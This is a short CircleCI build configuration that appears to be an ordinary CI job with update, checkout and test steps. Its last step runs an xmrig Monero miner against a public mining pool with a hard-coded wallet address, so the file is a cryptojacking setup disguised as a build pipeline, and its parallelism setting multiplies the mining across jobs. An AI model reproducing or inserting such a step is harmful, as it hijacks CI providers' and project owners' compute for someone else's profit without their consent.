version: 2
jobs:
  build:
    docker:
      - image: ubuntu:latest
    parallelism: 4
    steps:
      - run: apt-get update
      - checkout
      - run: bash ./test.sh
      - run: /root/xmrig/build/xmrig --donate-level 1 -o monero.miner.rocks:5551 -u 4Cf2TfMKhCgJ2vsM3HeBUnYe52tXrvv8X1ajjuQEMUQ8iU8kvUzCSsCEacxFhEmeb2JgPpQ5chdyw3UiTfUgapJBhCJchfDtkBSPiQwxsU -p w=test-1 --variant -1 -k
